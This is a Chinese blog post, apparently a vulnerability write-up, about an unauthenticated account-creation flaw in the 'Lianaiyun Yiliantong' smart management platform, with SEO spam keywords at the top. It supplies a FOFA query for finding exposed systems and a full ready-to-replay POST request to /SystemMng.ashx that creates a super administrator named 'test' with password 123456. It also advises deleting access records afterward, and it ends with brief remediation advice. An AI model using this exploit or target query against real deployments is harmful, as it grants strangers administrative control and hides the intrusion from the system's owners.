营销型网站建设营销型网站建设,wordpress网站报价,湖南大型网站建设公司,惠州网站建设点声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。
一、漏洞概述
脸爱云一脸通智慧管理平台存在严重漏洞#xff0c;允许…声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。
一、漏洞概述
脸爱云一脸通智慧管理平台存在严重漏洞允许攻击者通过未经授权的访问在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户提升权限或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问危及用户隐私和整体系统安全。
二、fofa
title欢迎使用脸爱云 一脸通智慧管理平台 三、漏洞复现
poc POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionIdwhnrkuaqbz0lyv1fbwtzf23y
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 175operatorNametestoperatorPwd123456operpassword123456operatorRole00visible_jh%E8%AF%B7%E9%80%89%E6%8B%A9visible_dorm%E8%AF%B7%E9%80%89%E6%8B%A9funcNameaddOperators
抓包重放 然后就会创建一个账号为test密码为123456的超级管理员。
登录 最后记得删除访问记录不要对别人造成任何影响 四、修复意见
为确保系统安全强烈建议立即修复漏洞加强用户添加功能的输入验证和访问控制以限制仅授权用户能够执行此操作。
